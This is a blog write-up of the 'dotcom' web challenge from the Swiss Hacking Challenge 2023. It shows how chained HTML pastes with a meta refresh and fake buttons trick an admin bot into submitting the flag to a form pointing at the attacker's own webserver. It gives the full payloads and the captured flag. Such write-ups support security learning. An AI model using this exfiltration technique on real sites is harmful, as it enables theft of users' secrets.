Gian Klug

Swiss Hacking Challenge 2023 - dotcom

Posted on Apr 24, 2023

Information

Challenge category: web

Challenge Description

In the early 2000s, John had an idea for a dotcom enterprise that would revolutionize the way people shop online. He worked tirelessly to develop the platform and attract investors, eventually launching the site to great fanfare. Sales skyrocketed, and John became a billionaire overnight. But as quickly as the company rose to prominence, it all came crashing down when the dotcom bubble burst.

Files

We are given a dotcom.zip file.

It contains the source code for a web application written in .NET/C#.

Analysis

We have two possibilities:

  • Create a new paste
  • Talk to the admin

Creating a new paste

The HTML input isn’t really sanitized but the CSP (Content Security Policy) prohibits the execution of JavaScript. I looked into it and there doesn’t seem to be any vulnerability.

Additionally we can see the raw version of a freshly created paste under /content/<paste id>. This will be handy later.

Talking to the admin

This starts a Selenium instance that does the following:

  1. Open the /view URL with the given paste id
  2. Clicking the Element with the ID of back
  3. Clicking on the element with the ID of create
  4. Entering the flag into the textarea with the id textArea
  5. Hitting the submit button with the id submit

Exploitation

We can create a series of posts to fake UI elements for the bot and in the end add a form to submit the flag to our own webserver.

The following snippets are upside down as you need them in this order to link to the ID of the previous paste:

<!-- This is the final paste that gets submitted -->
<form method="GET" action="http://your-webserver/CTF">
  <input type="text" id="textArea" name="flag"></input>
  <input type="submit" id="submit">
</form>


<!-- Fake the submit btn -->
<form action="/content/ID-OF-ABOVE-PASTE" method="GET">
  <input type="submit" id="create">
</form>


<!-- Fake the back btn -->
<form action="/content/ID-OF-ABOVE-PASTE" method="GET">
  <input type="submit" id="back">
</form>


<!-- The initial paste that redirects the bot away -->
<meta http-equiv="refresh" content="0; URL=/content/ID-OF-ABOVE-PASTE">

Flag

Once we send the id of the last paste to the admin bot we get the flag as a GET parameter in a request on our webserver:

shc2023{T0d4y_1_l34rnt_4_l0t_4b0ut_c5p_a5bb5269fda2}

Conclusion

I love web challenges! This was very fun.

References

  1. https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP